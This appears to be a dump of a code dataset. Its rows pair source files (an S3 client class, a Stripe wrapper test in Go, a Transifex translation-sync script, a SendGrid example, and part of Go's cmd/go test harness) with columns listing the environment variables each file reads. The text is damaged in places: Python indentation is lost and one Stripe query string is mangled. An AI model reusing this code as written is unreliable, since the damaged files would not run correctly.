(https://boto3.amazonaws.com/v1/documentation/api/latest/reference/customizations/s3.html#boto3.s3.transfer.TransferConfig)
"""
endpoint_url = endpoint_url or os.getenv("AWS_ENDPOINT_URL")
if boto3_session is not None:
self.sess = boto3_session
else:
self.sess = Session(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
aws_session_token=aws_session_token,
botocore_session=botocore_session,
profile_name=profile_name,
)
if no_sign_request:
self.s3 = self.sess.resource(
"s3",
endpoint_url=endpoint_url,
config=Config(signature_version=botocore.session.UNSIGNED),
)
self.client = self.sess.client(
"s3",
endpoint_url=endpoint_url,
config=Config(signature_version=botocore.session.UNSIGNED),
)
else:
self.s3 = self.sess.resource("s3", endpoint_url=endpoint_url)
self.client = self.sess.client("s3", endpoint_url=endpoint_url)
self.boto3_transfer_config = boto3_transfer_config
super().__init__(local_cache_dir=local_cache_dir)
def _get_metadata(self, cloud_path: S3Path) -> Dict[str, Any]:
data = self.s3.ObjectSummary(cloud_path.bucket, cloud_path.key).get()
return {
"last_modified": data["LastModified"],
"size": data["ContentLength"],
"etag": data["ETag"],
"mime": data["ContentType"],
"extra": data["Metadata"],
}
def _download_file(self, cloud_path: S3Path, local_path: Union[str, os.PathLike]) -> Path:
local_path = Path(local_path)
obj = self.s3.Object(cloud_path.bucket, cloud_path.key)
obj.download_file(str(local_path), Config=self.boto3_transfer_config)
return local_path
def _is_file_or_dir(self, cloud_path: S3Path) -> Optional[str]:
# short-circuit the root-level bucket
if not cloud_path.key:
return "dir"
# get first item by listing at least one key
s3_obj = self._s3_file_query(cloud_path)
if s3_obj is None:
return None
# since S3 only returns files when filtering objects:
# if the first item key is equal to the path key, this is a file
if s3_obj.key == cloud_path.key:
# "fake" directories on S3 can be created in the console UI
# these are 0-size keys that end in `/`
# Ref: https://github.com/boto/boto3/issues/377
if s3_obj.key.endswith("/") and s3_obj.content_length == 0:
return "dir"
else:
return "file"
else:
return "dir"
def _exists(self, cloud_path: S3Path) -> bool:
return self._s3_file_query(cloud_path) is not None
def _s3_file_query(self, cloud_path: S3Path):
"""Boto3 query used for quick checks of existence and if path is file/dir"""
# first check if this is an object that we can access directly
try:
obj = self.s3.Object(cloud_path.bucket, cloud_path.key)
obj.load()
return obj
# else, confirm it is a dir by filtering to the first item under the prefix
except ClientError:
return next(
(
obj
for obj in (
self.s3.Bucket(cloud_path.bucket)
.objects.filter(Prefix=cloud_path.key)
.limit(1)
)
),
None,
)
def _list_dir(self, cloud_path: S3Path, recursive=False) -> Iterable[S3Path]:
bucket = self.s3.Bucket(cloud_path.bucket)
prefix = cloud_path.key
if prefix and not prefix.endswith("/"):
prefix += "/"
yielded_dirs = set()
if recursive:
for o in bucket.objects.filter(Prefix=prefix):
# get directory from this path
for parent in PurePosixPath(o.key[len(prefix) :]).parents:
# if we haven't surfaced their directory already
if parent not in yielded_dirs and str(parent) != ".":
yield self.CloudPath(f"s3://{cloud_path.bucket}/{prefix}{parent}")
yielded_dirs.add(parent)
yield self.CloudPath(f"s3://{o.bucket_name}/{o.key}")
else:
# non recursive is best done with old client API rather than resource
paginator = self.client.get_paginator("list_objects")
for result in paginator.paginate(
Bucket=cloud_path.bucket, Prefix=prefix, Delimiter="/"
):
# sub directory names
for result_prefix in result.get("CommonPrefixes", []):
yield self.CloudPath(f"s3://{cloud_path.bucket}/{result_prefix.get('Prefix')}")
# files in the directory
for result_key in result.get("Contents", []):
if result_key.get('Size') > 0:
yield self.CloudPath(f"s3://{cloud_path.bucket}/{result_key.get('Key')}")
def _move_file(self, src: S3Path, dst: S3Path, remove_src: bool = True) -> S3Path:
# just a touch, so "REPLACE" metadata
if src == dst:
o = self.s3.Object(src.bucket, src.key)
o.copy_from(
CopySource={"Bucket": src.bucket, "Key": src.key},
Metadata=self._get_metadata(src).get("extra", {}),
MetadataDirective="REPLACE",
)
else:
target = self.s3.Object(dst.bucket, dst.key)
target.copy({"Bucket": src.bucket, "Key": src.key})
if remove_src:
self._remove(src)
return dst
def _remove(self, cloud_path: S3Path) -> None:
try:
obj = self.s3.Object(cloud_path.bucket, cloud_path.key)
# will throw if not a file
obj.load()
resp = obj.delete()
assert resp.get("ResponseMetadata").get("HTTPStatusCode") == 204
except ClientError:
# try to delete as a direcotry instead
bucket = self.s3.Bucket(cloud_path.bucket)
prefix = cloud_path.key
if prefix and not prefix.endswith("/"):
prefix += "/"
resp = bucket.objects.filter(Prefix=prefix).delete()
# ensure directory deleted; if cloud_path did not exist at all
# resp will be [], so no need to check success
if resp:
assert resp[0].get("ResponseMetadata").get("HTTPStatusCode") == 200
def _upload_file(self, local_path: Union[str, os.PathLike], cloud_path: S3Path) -> S3Path:
obj = self.s3.Object(cloud_path.bucket, cloud_path.key)
obj.upload_file(str(local_path), Config=self.boto3_transfer_config)
return cloud_path
S3Client.S3Path = S3Client.CloudPath # type: ignore
| []
| []
| [
"AWS_ENDPOINT_URL"
]
| [] | ["AWS_ENDPOINT_URL"] | python | 1 | 0 | |
stripe_test.go | package stripeutil
import (
"encoding/json"
"os"
"strconv"
"testing"
"time"
stripelib "github.com/stripe/stripe-go/v72"
)
func Test_Params(t *testing.T) {
tests := []struct {
params Params
expected string
}{
{
Params{"email": "[email protected]"},
"email=me%40example.com",
},
{
Params{
"invoice_settings": Params{
"default_payment_method": "pm_123456",
},
},
"invoice_settings[default_payment_method]=pm_123456",
},
{
Params{
"customer": "cu_123456",
"items": []Params{
{"price": "pr_123456"},
},
"expand": []string{"latest_invoice.payment_intent"},
},
"customer=cu_123456&expand[0]=latest_invoice.payment_intent&items[0][price]=pr_123456",
},
{
Params{
"amount": 2000,
"currency": "gbp",
"payment_method_types": []string{"card"},
},
"amount=2000¤cy=gbp&payment_method_types[0]=card",
},
}
for i, test := range tests {
encoded := test.params.Encode()
if encoded != test.expected {
t.Errorf("tests[%d] - unexpected encoding, expected=%q, got=%q\n", i, test.expected, encoded)
}
}
}
func Test_Stripe(t *testing.T) {
secret := os.Getenv("STRIPE_SECRET")
price := os.Getenv("STRIPE_PRICE")
if secret == "" || price == "" {
t.Skip("STRIPE_SECRET and STRIPE_PRICE not set, skipping")
}
store := newTestStore()
stripe := New(secret, store)
c, err := stripe.Customer("[email protected]")
if err != nil {
t.Fatal(err)
}
resp, err := stripe.Post(paymentMethodEndpoint, Params{
"card": Params{
"number": "4242424242424242",
"exp_month": "12",
"exp_year": strconv.FormatInt(int64(time.Now().Add(time.Hour*24*365).Year()), 10),
"cvc": "111",
},
"type": "card",
})
if err != nil {
t.Fatal(err)
}
defer resp.Body.Close()
if !respCode2xx(resp.StatusCode) {
t.Fatal(stripe.Error(resp))
}
pm := &PaymentMethod{
PaymentMethod: &stripelib.PaymentMethod{},
}
json.NewDecoder(resp.Body).Decode(pm)
if err := pm.Attach(stripe, c); err != nil {
t.Fatal(err)
}
_, err = stripe.Subscribe(c, pm, Params{
"items": []Params{
{"price": price},
},
})
if err != nil {
t.Fatal(err)
}
if _, err := stripe.Unsubscribe(c); err != nil {
t.Fatal(err)
}
resp1, err := stripe.Delete(c.Endpoint())
if err != nil {
t.Fatal(err)
}
defer resp1.Body.Close()
if !respCode2xx(resp1.StatusCode) {
t.Fatal(stripe.Error(resp1))
}
}
| [
"\"STRIPE_SECRET\"",
"\"STRIPE_PRICE\""
]
| []
| [
"STRIPE_SECRET",
"STRIPE_PRICE"
]
| [] | ["STRIPE_SECRET", "STRIPE_PRICE"] | go | 2 | 0 | |
tools/yaml_to_json.py | import os
import re
from pathlib import Path
from hashlib import md5
from slugify import slugify
import glob
import yaml
import json
import requests
PROJECT = 'avid-covider'
def calc_hash(s):
ret = md5(s.encode('utf8')).hexdigest()[:10]
return ret
HEB = re.compile('[א-ת]')
def has_hebrew(s):
return len(HEB.findall(s)) > 0
def get_field(x, f):
parts = f.split('.')
while len(parts) > 0:
p = parts.pop(0)
x = x.get(p, {})
return x
def get_uid(x, stack, index=None):
try:
FIELDS = ['name', 'wait.variable', 'say', 'switch.arg', 'do.cmd', 'do.variable', 'match', 'pattern', 'default', 'show']
values = [get_field(x, f) for f in FIELDS]
values = ','.join([str(v) for v in values if v is not None])
assert len(values) > 0
current_hash = ''.join(stack)
key = '{}|{}|{}'.format(current_hash, values, index)
ret = calc_hash(key)
return ret
except:
print(x, stack)
raise
def assign_ids(x, stack=[]):
if isinstance(x, dict):
uid = None
for k, v in x.items():
if k == 'steps':
uid = get_uid(x, stack)
for i, s in enumerate(v):
new_stack = stack + [uid, str(i)]
s['uid'] = get_uid(s, new_stack, i)
assign_ids(s, new_stack)
else:
assign_ids(v, stack)
if uid is not None:
x['uid'] = uid
elif isinstance(x, list):
for xx in x:
assign_ids(xx, stack)
else:
return
TRANSIFEX_TOKEN = os.environ.get('TRANSIFEX_TOKEN') or os.environ.get('TX_TOKEN')
LANGUAGES = ('ar', 'am', 'en', 'km-KH', 'ru', 'es', 'fr')
def assign_translations(x, stack, parent=None, parentkey=None, translations=None, fields=(), field_in_key=False):
if isinstance(x, dict):
key = None
if x.get('slug'):
stack.append(x['slug'])
elif x.get('name'):
stack.append(slugify(x['name']))
if 'uid' in x:
stack.append(x['uid'][:2])
for k, v in x.items():
if k == 'steps':
for s in v:
new_stack = stack + []
yield from assign_translations(s, new_stack,
parent=None, parentkey=None,
translations=translations, fields=fields, field_in_key=field_in_key)
else:
yield from assign_translations(v, stack[:],
parent=x, parentkey=k,
translations=translations, fields=fields, field_in_key=field_in_key
)
elif isinstance(x, list):
for index, xx in enumerate(x):
new_stack = stack + [index]
yield from assign_translations(xx, new_stack,
parent=x, parentkey=index,
translations=translations, fields=fields, field_in_key=field_in_key
)
elif isinstance(x, str):
if parent and parentkey is not None and has_hebrew(x):
if isinstance(parentkey, str) and parentkey not in fields:
return
if field_in_key:
key = '/'.join(str(s) for s in stack + [parentkey])
else:
key = '/'.join(str(s) for s in stack)
yield key, x
if key in translations:
parent[parentkey]={'.tx': dict(translations[key], _=x)}
# else:
# print('KEY NOT IN TX %s'% key)
def transifex_session():
s = requests.Session()
s.auth = ('api', TRANSIFEX_TOKEN)
return s
def transifex_slug(filename):
return '_'.join(filename.parts).replace('.', '_')
def push_translations(filename: Path, translations):
translations = dict(he=translations)
content = yaml.dump(translations, allow_unicode=True, indent=2, width=1000000)
slug = transifex_slug(filename)
s = transifex_session()
resp = s.get(f'https://www.transifex.com/api/2/project/{PROJECT}/resource/{slug}/')
if resp.status_code == requests.codes.ok:
print('Update file:')
data = dict(
content=content,
)
resp = s.put(
f'https://www.transifex.com/api/2/project/{PROJECT}/resource/{slug}/content/',
json=data
)
print(resp.status_code, resp.content[:50])
else:
print('New file:', slug)
data = dict(
slug=slug,
name=str(filename),
accept_translations=True,
i18n_type='YAML_GENERIC',
content=content,
)
resp = s.post(
f'https://www.transifex.com/api/2/project/{PROJECT}/resources/',
json=data
)
print(resp.status_code, resp.content[:100])
def pull_translations(lang, filename):
s = transifex_session()
slug = transifex_slug(filename)
url = f'https://www.transifex.com/api/2/project/{PROJECT}/resource/{slug}/translation/{lang}/'
try:
translations = s.get(url).json()
except json.decoder.JSONDecodeError:
print('No data from %s' % url)
return {}
translations = yaml.load(translations['content'], Loader=yaml.BaseLoader)['he']
translations = dict((k, v) for k, v in translations.items() if v)
return translations
def write_ical(title, body, path):
path = 'dist/avid-covider/{}assets/corona_reminder.ics'.format(path)
with open(path, 'w', encoding='utf8') as ics:
ics.write('''BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//Microsoft Corporation//Outlook 12.0 MIMEDIR//EN
METHOD:PUBLISH
CALSCALE:GREGORIAN
BEGIN:VTIMEZONE
TZID:Asia/Jerusalem
TZURL:http://tzurl.org/zoneinfo-outlook/Asia/Jerusalem
X-LIC-LOCATION:Asia/Jerusalem
BEGIN:DAYLIGHT
TZOFFSETFROM:+0200
TZOFFSETTO:+0300
TZNAME:EEST
DTSTART:19700329T000000
RRULE:FREQ=YEARLY;BYMONTH=3;BYDAY=-1SU
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:+0300
TZOFFSETTO:+0200
TZNAME:EET
DTSTART:19701025T000000
RRULE:FREQ=YEARLY;BYMONTH=10;BYDAY=-1SU
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
DTSTAMP:20200328T131636Z
UID:corona-israel-0001
DTSTART;TZID=Asia/Jerusalem:20200328T080000
RRULE:FREQ=DAILY
DTEND;TZID=Asia/Jerusalem:20200328T081500
SUMMARY:{title}
URL:https://coronaisrael.org/?source=calendar
DESCRIPTION:{body}
LOCATION:https://coronaisrael.org/?source=calendar
TRANSP:TRANSPARENT
X-MICROSOFT-CDO-BUSYSTATUS:FREE
BEGIN:VALARM
ACTION:DISPLAY
DESCRIPTION:{title}
TRIGGER:-PT0M
END:VALARM
END:VEVENT
END:VCALENDAR'''.format(title=title, body=body))
def create_assets(script):
translations = {}
for x in script['keys']:
translations[x['name']] = x['show'].get('.tx',{})
languages = [(x, x+'/') for x in LANGUAGES] + [('_', '')]
for lang, path in languages:
calendarTitle = translations['calendarTitle']
calendarTitle=calendarTitle.get(lang, calendarTitle.get('_'))
calendarBody = translations['calendarBody']
calendarBody=calendarBody.get(lang, calendarBody.get('_'))
try:
write_ical(calendarTitle, calendarBody, path)
except Exception as e:
print('Failed to write ical %s' % e)
if __name__=='__main__':
f_in = Path('scripts/script.yaml')
scripts = yaml.load(f_in.open(), Loader=yaml.BaseLoader)
assign_ids(scripts, [str(f_in)])
if TRANSIFEX_TOKEN:
rx_translations = {}
for lang in LANGUAGES:
lang_translations = pull_translations(lang, f_in)
for key, value in lang_translations.items():
rx_translations.setdefault(key, {})[lang] = value
tx_translations = {}
for script in scripts:
for k, v in assign_translations(script, [], translations=rx_translations, fields=('show', 'say', 'placeholder')):
assert tx_translations.get(k, v) == v, 'Duplicate key %s (v=%r, tx[k]==%r)' % (k, v, tx_translations[k])
tx_translations[k] = v
print(k, v)
push_translations(f_in, tx_translations)
create_assets(scripts[-1])
scripts = dict(s=scripts)
f_out = Path('src/app/script.ts')
f_out.open('w').write('''
/* tslint:disable */
export const script = {};
'''.format(json.dumps(
scripts, ensure_ascii=False, sort_keys=True, indent=2)
)
)
| []
| []
| [
"TX_TOKEN",
"TRANSIFEX_TOKEN"
]
| [] | ["TX_TOKEN", "TRANSIFEX_TOKEN"] | python | 2 | 0 | |
examples/subusers/DeleteMonitorSettings.java | import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.sendgrid.*;
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
//////////////////////////////////////////////////////////////////
// Delete monitor settings
// DELETE /subusers/{subuser_name}/monitor
public class DeleteMonitorSettings {
public static void main(String[] args) throws IOException {
try {
SendGrid sg = new SendGrid(System.getenv("SENDGRID_API_KEY"));
Request request = new Request();
request.setMethod(Method.DELETE);
request.setEndpoint("subusers/{subuser_name}/monitor");
Response response = sg.api(request);
System.out.println(response.getStatusCode());
System.out.println(response.getBody());
System.out.println(response.getHeaders());
} catch (IOException ex) {
throw ex;
}
}
} | [
"\"SENDGRID_API_KEY\""
]
| []
| [
"SENDGRID_API_KEY"
]
| [] | ["SENDGRID_API_KEY"] | java | 1 | 0 | |
src/cmd/go/go_test.go | // Copyright 2015 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package main_test
import (
"bytes"
"debug/elf"
"debug/macho"
"debug/pe"
"encoding/binary"
"flag"
"fmt"
"go/format"
"internal/race"
"internal/testenv"
"io"
"io/fs"
"log"
"os"
"os/exec"
"path/filepath"
"regexp"
"runtime"
"strconv"
"strings"
"testing"
"time"
"cmd/go/internal/cache"
"cmd/go/internal/cfg"
"cmd/go/internal/robustio"
"cmd/internal/sys"
)
func init() {
// GOVCS defaults to public:git|hg,private:all,
// which breaks many tests here - they can't use non-git, non-hg VCS at all!
// Change to fully permissive.
// The tests of the GOVCS setting itself are in ../../testdata/script/govcs.txt.
os.Setenv("GOVCS", "*:all")
}
var (
canRace = false // whether we can run the race detector
canCgo = false // whether we can use cgo
canMSan = false // whether we can run the memory sanitizer
canASan = false // whether we can run the address sanitizer
)
var exeSuffix string = func() string {
if runtime.GOOS == "windows" {
return ".exe"
}
return ""
}()
func tooSlow(t *testing.T) {
if testing.Short() {
// In -short mode; skip test, except run it on the {darwin,linux,windows}/amd64 builders.
if testenv.Builder() != "" && runtime.GOARCH == "amd64" && (runtime.GOOS == "linux" || runtime.GOOS == "darwin" || runtime.GOOS == "windows") {
return
}
t.Helper()
t.Skip("skipping test in -short mode")
}
}
// testGOROOT is the GOROOT to use when running testgo, a cmd/go binary
// build from this process's current GOROOT, but run from a different
// (temp) directory.
var testGOROOT string
var testGOCACHE string
var testGo string
var testTmpDir string
var testBin string
// The TestMain function creates a go command for testing purposes and
// deletes it after the tests have been run.
func TestMain(m *testing.M) {
// $GO_GCFLAGS a compiler debug flag known to cmd/dist, make.bash, etc.
// It is not a standard go command flag; use os.Getenv, not cfg.Getenv.
if os.Getenv("GO_GCFLAGS") != "" {
fmt.Fprintf(os.Stderr, "testing: warning: no tests to run\n") // magic string for cmd/go
fmt.Printf("cmd/go test is not compatible with $GO_GCFLAGS being set\n")
fmt.Printf("SKIP\n")
return
}
flag.Parse()
if *proxyAddr != "" {
StartProxy()
select {}
}
// Run with a temporary TMPDIR to check that the tests don't
// leave anything behind.
topTmpdir, err := os.MkdirTemp("", "cmd-go-test-")
if err != nil {
log.Fatal(err)
}
if !*testWork {
defer removeAll(topTmpdir)
}
os.Setenv(tempEnvName(), topTmpdir)
dir, err := os.MkdirTemp(topTmpdir, "tmpdir")
if err != nil {
log.Fatal(err)
}
testTmpDir = dir
if !*testWork {
defer removeAll(testTmpDir)
}
testGOCACHE = cache.DefaultDir()
if testenv.HasGoBuild() {
testBin = filepath.Join(testTmpDir, "testbin")
if err := os.Mkdir(testBin, 0777); err != nil {
log.Fatal(err)
}
testGo = filepath.Join(testBin, "go"+exeSuffix)
args := []string{"build", "-tags", "testgo", "-o", testGo}
if race.Enabled {
args = append(args, "-race")
}
gotool, err := testenv.GoTool()
if err != nil {
fmt.Fprintln(os.Stderr, err)
os.Exit(2)
}
goEnv := func(name string) string {
out, err := exec.Command(gotool, "env", name).CombinedOutput()
if err != nil {
fmt.Fprintf(os.Stderr, "go env %s: %v\n%s", name, err, out)
os.Exit(2)
}
return strings.TrimSpace(string(out))
}
testGOROOT = goEnv("GOROOT")
os.Setenv("TESTGO_GOROOT", testGOROOT)
// Ensure that GOROOT is set explicitly.
// Otherwise, if the toolchain was built with GOROOT_FINAL set but has not
// yet been moved to its final location, programs that invoke runtime.GOROOT
// may accidentally use the wrong path.
os.Setenv("GOROOT", testGOROOT)
// The whole GOROOT/pkg tree was installed using the GOHOSTOS/GOHOSTARCH
// toolchain (installed in GOROOT/pkg/tool/GOHOSTOS_GOHOSTARCH).
// The testgo.exe we are about to create will be built for GOOS/GOARCH,
// which means it will use the GOOS/GOARCH toolchain
// (installed in GOROOT/pkg/tool/GOOS_GOARCH).
// If these are not the same toolchain, then the entire standard library
// will look out of date (the compilers in those two different tool directories
// are built for different architectures and have different build IDs),
// which will cause many tests to do unnecessary rebuilds and some
// tests to attempt to overwrite the installed standard library.
// Bail out entirely in this case.
hostGOOS := goEnv("GOHOSTOS")
hostGOARCH := goEnv("GOHOSTARCH")
if hostGOOS != runtime.GOOS || hostGOARCH != runtime.GOARCH {
fmt.Fprintf(os.Stderr, "testing: warning: no tests to run\n") // magic string for cmd/go
fmt.Printf("cmd/go test is not compatible with GOOS/GOARCH != GOHOSTOS/GOHOSTARCH (%s/%s != %s/%s)\n", runtime.GOOS, runtime.GOARCH, hostGOOS, hostGOARCH)
fmt.Printf("SKIP\n")
return
}
buildCmd := exec.Command(gotool, args...)
buildCmd.Env = append(os.Environ(), "GOFLAGS=-mod=vendor")
out, err := buildCmd.CombinedOutput()
if err != nil {
fmt.Fprintf(os.Stderr, "building testgo failed: %v\n%s", err, out)
os.Exit(2)
}
cmd := exec.Command(testGo, "env", "CGO_ENABLED")
cmd.Stderr = new(strings.Builder)
if out, err := cmd.Output(); err != nil {
fmt.Fprintf(os.Stderr, "running testgo failed: %v\n%s", err, cmd.Stderr)
os.Exit(2)
} else {
canCgo, err = strconv.ParseBool(strings.TrimSpace(string(out)))
if err != nil {
fmt.Fprintf(os.Stderr, "can't parse go env CGO_ENABLED output: %v\n", strings.TrimSpace(string(out)))
}
}
out, err = exec.Command(gotool, "env", "GOCACHE").CombinedOutput()
if err != nil {
fmt.Fprintf(os.Stderr, "could not find testing GOCACHE: %v\n%s", err, out)
os.Exit(2)
}
testGOCACHE = strings.TrimSpace(string(out))
canMSan = canCgo && sys.MSanSupported(runtime.GOOS, runtime.GOARCH)
canASan = canCgo && sys.ASanSupported(runtime.GOOS, runtime.GOARCH)
canRace = canCgo && sys.RaceDetectorSupported(runtime.GOOS, runtime.GOARCH)
// The race detector doesn't work on Alpine Linux:
// golang.org/issue/14481
// gccgo does not support the race detector.
if isAlpineLinux() || runtime.Compiler == "gccgo" {
canRace = false
}
}
// Don't let these environment variables confuse the test.
os.Setenv("GOENV", "off")
os.Unsetenv("GOFLAGS")
os.Unsetenv("GOBIN")
os.Unsetenv("GOPATH")
os.Unsetenv("GIT_ALLOW_PROTOCOL")
os.Setenv("HOME", "/test-go-home-does-not-exist")
// On some systems the default C compiler is ccache.
// Setting HOME to a non-existent directory will break
// those systems. Disable ccache and use real compiler. Issue 17668.
os.Setenv("CCACHE_DISABLE", "1")
if cfg.Getenv("GOCACHE") == "" {
os.Setenv("GOCACHE", testGOCACHE) // because $HOME is gone
}
r := m.Run()
if !*testWork {
removeAll(testTmpDir) // os.Exit won't run defer
}
if !*testWork {
// There shouldn't be anything left in topTmpdir.
dirf, err := os.Open(topTmpdir)
if err != nil {
log.Fatal(err)
}
names, err := dirf.Readdirnames(0)
if err != nil {
log.Fatal(err)
}
if len(names) > 0 {
log.Fatalf("unexpected files left in tmpdir: %v", names)
}
removeAll(topTmpdir)
}
os.Exit(r)
}
func isAlpineLinux() bool {
if runtime.GOOS != "linux" {
return false
}
fi, err := os.Lstat("/etc/alpine-release")
return err == nil && fi.Mode().IsRegular()
}
// The length of an mtime tick on this system. This is an estimate of
// how long we need to sleep to ensure that the mtime of two files is
// different.
// We used to try to be clever but that didn't always work (see golang.org/issue/12205).
var mtimeTick time.Duration = 1 * time.Second
// Manage a single run of the testgo binary.
type testgoData struct {
t *testing.T
temps []string
env []string
tempdir string
ran bool
inParallel bool
stdout, stderr bytes.Buffer
execDir string // dir for tg.run
}
// skipIfGccgo skips the test if using gccgo.
func skipIfGccgo(t *testing.T, msg string) {
if runtime.Compiler == "gccgo" {
t.Skipf("skipping test not supported on gccgo: %s", msg)
}
}
// testgo sets up for a test that runs testgo.
func testgo(t *testing.T) *testgoData {
t.Helper()
testenv.MustHaveGoBuild(t)
testenv.SkipIfShortAndSlow(t)
return &testgoData{t: t}
}
// must gives a fatal error if err is not nil.
func (tg *testgoData) must(err error) {
tg.t.Helper()
if err != nil {
tg.t.Fatal(err)
}
}
// check gives a test non-fatal error if err is not nil.
func (tg *testgoData) check(err error) {
tg.t.Helper()
if err != nil {
tg.t.Error(err)
}
}
// parallel runs the test in parallel by calling t.Parallel.
func (tg *testgoData) parallel() {
tg.t.Helper()
if tg.ran {
tg.t.Fatal("internal testsuite error: call to parallel after run")
}
for _, e := range tg.env {
if strings.HasPrefix(e, "GOROOT=") || strings.HasPrefix(e, "GOPATH=") || strings.HasPrefix(e, "GOBIN=") {
val := e[strings.Index(e, "=")+1:]
if strings.HasPrefix(val, "testdata") || strings.HasPrefix(val, "./testdata") {
tg.t.Fatalf("internal testsuite error: call to parallel with testdata in environment (%s)", e)
}
}
}
tg.inParallel = true
tg.t.Parallel()
}
// pwd returns the current directory.
func (tg *testgoData) pwd() string {
tg.t.Helper()
wd, err := os.Getwd()
if err != nil {
tg.t.Fatalf("could not get working directory: %v", err)
}
return wd
}
// sleep sleeps for one tick, where a tick is a conservative estimate
// of how long it takes for a file modification to get a different
// mtime.
func (tg *testgoData) sleep() {
time.Sleep(mtimeTick)
}
// setenv sets an environment variable to use when running the test go
// command.
func (tg *testgoData) setenv(name, val string) {
tg.t.Helper()
if tg.inParallel && (name == "GOROOT" || name == "GOPATH" || name == "GOBIN") && (strings.HasPrefix(val, "testdata") || strings.HasPrefix(val, "./testdata")) {
tg.t.Fatalf("internal testsuite error: call to setenv with testdata (%s=%s) after parallel", name, val)
}
tg.unsetenv(name)
tg.env = append(tg.env, name+"="+val)
}
// unsetenv removes an environment variable.
func (tg *testgoData) unsetenv(name string) {
if tg.env == nil {
tg.env = append([]string(nil), os.Environ()...)
tg.env = append(tg.env, "GO111MODULE=off")
}
for i, v := range tg.env {
if strings.HasPrefix(v, name+"=") {
tg.env = append(tg.env[:i], tg.env[i+1:]...)
break
}
}
}
func (tg *testgoData) goTool() string {
return testGo
}
// doRun runs the test go command, recording stdout and stderr and
// returning exit status.
func (tg *testgoData) doRun(args []string) error {
tg.t.Helper()
if tg.inParallel {
for _, arg := range args {
if strings.HasPrefix(arg, "testdata") || strings.HasPrefix(arg, "./testdata") {
tg.t.Fatal("internal testsuite error: parallel run using testdata")
}
}
}
hasGoroot := false
for _, v := range tg.env {
if strings.HasPrefix(v, "GOROOT=") {
hasGoroot = true
break
}
}
prog := tg.goTool()
if !hasGoroot {
tg.setenv("GOROOT", testGOROOT)
}
tg.t.Logf("running testgo %v", args)
cmd := exec.Command(prog, args...)
tg.stdout.Reset()
tg.stderr.Reset()
cmd.Dir = tg.execDir
cmd.Stdout = &tg.stdout
cmd.Stderr = &tg.stderr
cmd.Env = tg.env
status := cmd.Run()
if tg.stdout.Len() > 0 {
tg.t.Log("standard output:")
tg.t.Log(tg.stdout.String())
}
if tg.stderr.Len() > 0 {
tg.t.Log("standard error:")
tg.t.Log(tg.stderr.String())
}
tg.ran = true
return status
}
// run runs the test go command, and expects it to succeed.
func (tg *testgoData) run(args ...string) {
tg.t.Helper()
if status := tg.doRun(args); status != nil {
wd, _ := os.Getwd()
tg.t.Logf("go %v failed unexpectedly in %s: %v", args, wd, status)
tg.t.FailNow()
}
}
// runFail runs the test go command, and expects it to fail.
func (tg *testgoData) runFail(args ...string) {
tg.t.Helper()
if status := tg.doRun(args); status == nil {
tg.t.Fatal("testgo succeeded unexpectedly")
} else {
tg.t.Log("testgo failed as expected:", status)
}
}
// runGit runs a git command, and expects it to succeed.
func (tg *testgoData) runGit(dir string, args ...string) {
tg.t.Helper()
cmd := exec.Command("git", args...)
tg.stdout.Reset()
tg.stderr.Reset()
cmd.Stdout = &tg.stdout
cmd.Stderr = &tg.stderr
cmd.Dir = dir
cmd.Env = tg.env
status := cmd.Run()
if tg.stdout.Len() > 0 {
tg.t.Log("git standard output:")
tg.t.Log(tg.stdout.String())
}
if tg.stderr.Len() > 0 {
tg.t.Log("git standard error:")
tg.t.Log(tg.stderr.String())
}
if status != nil {
tg.t.Logf("git %v failed unexpectedly: %v", args, status)
tg.t.FailNow()
}
}
// getStdout returns standard output of the testgo run as a string.
func (tg *testgoData) getStdout() string {
tg.t.Helper()
if !tg.ran {
tg.t.Fatal("internal testsuite error: stdout called before run")
}
return tg.stdout.String()
}
// getStderr returns standard error of the testgo run as a string.
func (tg *testgoData) getStderr() string {
tg.t.Helper()
if !tg.ran {
tg.t.Fatal("internal testsuite error: stdout called before run")
}
return tg.stderr.String()
}
// doGrepMatch looks for a regular expression in a buffer, and returns
// whether it is found. The regular expression is matched against
// each line separately, as with the grep command.
func (tg *testgoData) doGrepMatch(match string, b *bytes.Buffer) bool {
tg.t.Helper()
if !tg.ran {
tg.t.Fatal("internal testsuite error: grep called before run")
}
re := regexp.MustCompile(match)
for _, ln := range bytes.Split(b.Bytes(), []byte{'\n'}) {
if re.Match(ln) {
return true
}
}
return false
}
// doGrep looks for a regular expression in a buffer and fails if it
// is not found. The name argument is the name of the output we are
// searching, "output" or "error". The msg argument is logged on
// failure.
func (tg *testgoData) doGrep(match string, b *bytes.Buffer, name, msg string) {
tg.t.Helper()
if !tg.doGrepMatch(match, b) {
tg.t.Log(msg)
tg.t.Logf("pattern %v not found in standard %s", match, name)
tg.t.FailNow()
}
}
// grepStdout looks for a regular expression in the test run's
// standard output and fails, logging msg, if it is not found.
func (tg *testgoData) grepStdout(match, msg string) {
tg.t.Helper()
tg.doGrep(match, &tg.stdout, "output", msg)
}
// grepStderr looks for a regular expression in the test run's
// standard error and fails, logging msg, if it is not found.
func (tg *testgoData) grepStderr(match, msg string) {
tg.t.Helper()
tg.doGrep(match, &tg.stderr, "error", msg)
}
// grepBoth looks for a regular expression in the test run's standard
// output or stand error and fails, logging msg, if it is not found.
func (tg *testgoData) grepBoth(match, msg string) {
tg.t.Helper()
if !tg.doGrepMatch(match, &tg.stdout) && !tg.doGrepMatch(match, &tg.stderr) {
tg.t.Log(msg)
tg.t.Logf("pattern %v not found in standard output or standard error", match)
tg.t.FailNow()
}
}
// doGrepNot looks for a regular expression in a buffer and fails if
// it is found. The name and msg arguments are as for doGrep.
func (tg *testgoData) doGrepNot(match string, b *bytes.Buffer, name, msg string) {
tg.t.Helper()
if tg.doGrepMatch(match, b) {
tg.t.Log(msg)
tg.t.Logf("pattern %v found unexpectedly in standard %s", match, name)
tg.t.FailNow()
}
}
// grepStdoutNot looks for a regular expression in the test run's
// standard output and fails, logging msg, if it is found.
func (tg *testgoData) grepStdoutNot(match, msg string) {
tg.t.Helper()
tg.doGrepNot(match, &tg.stdout, "output", msg)
}
// grepStderrNot looks for a regular expression in the test run's
// standard error and fails, logging msg, if it is found.
